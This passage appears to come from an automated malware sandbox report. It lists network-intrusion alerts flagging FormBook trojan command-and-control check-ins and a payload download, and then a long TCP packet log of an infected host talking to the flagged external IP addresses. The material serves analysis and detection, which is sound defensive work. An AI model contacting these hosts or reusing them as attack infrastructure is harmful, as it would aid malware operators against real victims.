192.168.11.20104.21.39.11449842802031412 03/20/23-09:15:00.044344	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.11.20	104.21.39.114
192.168.11.20165.160.15.2049835802031453 03/20/23-09:13:17.988587	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49835	80	192.168.11.20	165.160.15.20
192.168.11.20195.133.40.4649810802018752 03/20/23-09:09:13.434535	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49810	80	192.168.11.20	195.133.40.46
192.168.11.20188.114.97.349822802031412 03/20/23-09:10:34.025355	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49822	80	192.168.11.20	188.114.97.3
192.168.11.2013.248.157.3249840802031453 03/20/23-09:14:39.545243	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49840	80	192.168.11.20	13.248.157.32
192.168.11.20188.114.97.349822802031453 03/20/23-09:10:34.025355	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49822	80	192.168.11.20	188.114.97.3
192.168.11.2013.248.157.3249840802031412 03/20/23-09:14:39.545243	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49840	80	192.168.11.20	13.248.157.32
192.168.11.20169.60.232.13949844802031453 03/20/23-09:15:33.016841	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49844	80	192.168.11.20	169.60.232.139
192.168.11.20169.60.232.13949844802031412 03/20/23-09:15:33.016841	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49844	80	192.168.11.20	169.60.232.139
192.168.11.2081.17.29.14749823802031449 03/20/23-09:10:54.265433	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	81.17.29.147

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 09:09:13.415043116 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.433906078 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.434035063 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.434535027 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.461829901 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.461865902 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.461916924 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.461976051 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.461987972 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.461999893 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.462011099 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.462033033 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.462148905 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462148905 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462148905 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462148905 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462148905 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462148905 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462156057 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.462157011 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.462286949 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462486029 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.462655067 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.480679989 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480778933 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480791092 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480807066 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480822086 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480833054 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480844975 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480881929 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.480894089 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481041908 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481046915 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481046915 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481046915 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481046915 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481046915 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481046915 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481054068 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481067896 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481082916 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481095076 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481220007 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481228113 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481229067 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481230021 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481230021 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481355906 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481355906 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481369019 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481369972 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.481525898 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.481694937 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502079010 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502176046 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502228975 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502242088 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502254963 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502268076 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502273083 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502286911 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502300024 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502336025 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502350092 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502365112 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502382040 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502439022 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502439022 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502439976 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502440929 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502440929 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502454996 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502470016 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502500057 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502512932 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502612114 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502614021 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502614021 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502614975 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502615929 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502613068 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502633095 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502640009 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502640009 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502640009 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502648115 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502660990 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502677917 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502695084 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502707958 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502723932 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502742052 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502756119 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502769947 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502784967 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502810955 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502820015 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502862930 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502876043 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502892017 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.502952099 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.503140926 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.503140926 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524377108 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524468899 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524524927 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524595976 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524600029 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524655104 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524667025 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524677992 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524696112 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524708033 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524719000 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524755955 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524766922 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524768114 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524766922 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524785995 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524802923 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524815083 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524826050 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524837971 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524856091 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524868965 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524879932 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524893045 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524909019 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524920940 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524931908 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524938107 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524938107 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524938107 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524938107 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524938107 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.524945021 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524960041 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524971962 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524982929 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.524993896 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525023937 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525034904 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525047064 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525110960 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525110960 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525110960 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525110960 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525110960 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525125980 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525127888 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525129080 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525130033 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525141001 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525154114 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525181055 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525192022 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525279999 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525279999 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525279999 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525279999 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525279999 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525285006 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525286913 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525286913 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525288105 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525288105 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525289059 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525300026 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525315046 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525413990 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525413990 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525413990 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525413990 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525413990 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525587082 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525587082 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525587082 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525587082 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525587082 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525587082 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525589943 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525593042 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525593042 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525593996 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525594950 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525594950 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525595903 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525595903 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525597095 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525597095 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525598049 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525598049 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525598049 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525599003 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525599003 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525599957 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525599957 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525612116 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525655985 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525667906 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525677919 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525755882 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525755882 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525755882 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525755882 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525755882 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525755882 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525757074 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525757074 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525763035 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525769949 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525769949 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525774956 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525801897 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525801897 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.525810957 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525840044 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525854111 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525868893 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525882006 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525893927 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.525907993 CET	80	49810	195.133.40.46	192.168.11.20
Mar 20, 2023 09:09:13.526007891 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526007891 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526007891 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526007891 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526007891 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526007891 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526175976 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526175976 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526175976 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:13.526175976 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:31.465215921 CET	49810	80	192.168.11.20	195.133.40.46
Mar 20, 2023 09:09:55.176733971 CET	49816	80	192.168.11.20	192.187.111.221
Mar 20, 2023 09:09:55.302464962 CET	80	49816	192.187.111.221	192.168.11.20
Mar 20, 2023 09:09:55.302764893 CET	49816	80	192.168.11.20	192.187.111.221
Mar 20, 2023 09:09:55.302942991 CET	49816	80	192.168.11.20	192.187.111.221
Mar 20, 2023 09:09:55.428514004 CET	80	49816	192.187.111.221	192.168.11.20
Mar 20, 2023 09:09:55.433347940 CET	80	49816	192.187.111.221	192.168.11.20
Mar 20, 2023 09:09:55.433414936 CET	80	49816	192.187.111.221	192.168.11.20
Mar 20, 2023 09:09:55.433701992 CET	49816	80	192.168.11.20	192.187.111.221
Mar 20, 2023 09:09:55.433772087 CET	49816	80	192.168.11.20	192.187.111.221
Mar 20, 2023 09:09:55.560810089 CET	80	49816	192.187.111.221	192.168.11.20
Mar 20, 2023 09:10:13.630337000 CET	49819	80	192.168.11.20	142.250.185.211
Mar 20, 2023 09:10:13.640677929 CET	80	49819	142.250.185.211	192.168.11.20
Mar 20, 2023 09:10:13.640820980 CET	49819	80	192.168.11.20	142.250.185.211
Mar 20, 2023 09:10:13.640886068 CET	49819	80	192.168.11.20	142.250.185.211
Mar 20, 2023 09:10:13.651293039 CET	80	49819	142.250.185.211	192.168.11.20
Mar 20, 2023 09:10:13.844963074 CET	80	49819	142.250.185.211	192.168.11.20
Mar 20, 2023 09:10:13.845031977 CET	80	49819	142.250.185.211	192.168.11.20
Mar 20, 2023 09:10:13.845335007 CET	49819	80	192.168.11.20	142.250.185.211
Mar 20, 2023 09:10:13.845335007 CET	49819	80	192.168.11.20	142.250.185.211
Mar 20, 2023 09:10:13.854409933 CET	80	49819	142.250.185.211	192.168.11.20
Mar 20, 2023 09:10:34.016237020 CET	49822	80	192.168.11.20	188.114.97.3
Mar 20, 2023 09:10:34.025031090 CET	80	49822	188.114.97.3	192.168.11.20
Mar 20, 2023 09:10:34.025273085 CET	49822	80	192.168.11.20	188.114.97.3
Mar 20, 2023 09:10:34.025355101 CET	49822	80	192.168.11.20	188.114.97.3
Mar 20, 2023 09:10:34.034095049 CET	80	49822	188.114.97.3	192.168.11.20
Mar 20, 2023 09:10:34.042653084 CET	80	49822	188.114.97.3	192.168.11.20
Mar 20, 2023 09:10:34.042740107 CET	80	49822	188.114.97.3	192.168.11.20
Mar 20, 2023 09:10:34.042932987 CET	49822	80	192.168.11.20	188.114.97.3
Mar 20, 2023 09:10:34.042932987 CET	49822	80	192.168.11.20	188.114.97.3
Mar 20, 2023 09:10:34.051650047 CET	80	49822	188.114.97.3	192.168.11.20
Mar 20, 2023 09:10:54.253040075 CET	49823	80	192.168.11.20	81.17.29.147
Mar 20, 2023 09:10:54.265178919 CET	80	49823	81.17.29.147	192.168.11.20
Mar 20, 2023 09:10:54.265372992 CET	49823	80	192.168.11.20	81.17.29.147
Mar 20, 2023 09:10:54.265433073 CET	49823	80	192.168.11.20	81.17.29.147
Mar 20, 2023 09:10:54.277749062 CET	80	49823	81.17.29.147	192.168.11.20
Mar 20, 2023 09:10:54.283816099 CET	80	49823	81.17.29.147	192.168.11.20
Mar 20, 2023 09:10:54.283885956 CET	80	49823	81.17.29.147	192.168.11.20
Mar 20, 2023 09:10:54.284297943 CET	49823	80	192.168.11.20	81.17.29.147
Mar 20, 2023 09:10:54.284297943 CET	49823	80	192.168.11.20	81.17.29.147
Mar 20, 2023 09:10:54.296756983 CET	80	49823	81.17.29.147	192.168.11.20
Mar 20, 2023 09:11:35.403026104 CET	49827	80	192.168.11.20	142.250.186.51
Mar 20, 2023 09:11:35.413965940 CET	80	49827	142.250.186.51	192.168.11.20
Mar 20, 2023 09:11:35.414180994 CET	49827	80	192.168.11.20	142.250.186.51
Mar 20, 2023 09:11:35.414279938 CET	49827	80	192.168.11.20	142.250.186.51
Mar 20, 2023 09:11:35.425091028 CET	80	49827	142.250.186.51	192.168.11.20
Mar 20, 2023 09:11:35.433589935 CET	80	49827	142.250.186.51	192.168.11.20
Mar 20, 2023 09:11:35.433659077 CET	80	49827	142.250.186.51	192.168.11.20
Mar 20, 2023 09:11:35.434077978 CET	49827	80	192.168.11.20	142.250.186.51
Mar 20, 2023 09:11:35.434077978 CET	49827	80	192.168.11.20	142.250.186.51
Mar 20, 2023 09:11:35.443275928 CET	80	49827	142.250.186.51	192.168.11.20
Mar 20, 2023 09:12:15.801728964 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:15.931886911 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:15.932137012 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:15.932254076 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.062608957 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065155983 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065227985 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065284014 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065329075 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065386057 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065408945 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.065479040 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065479994 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.065543890 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.065567017 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065639973 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065663099 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.065713882 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.065732002 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065797091 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.065817118 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.065886974 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.066049099 CET	49830	80	192.168.11.20	198.185.159.144
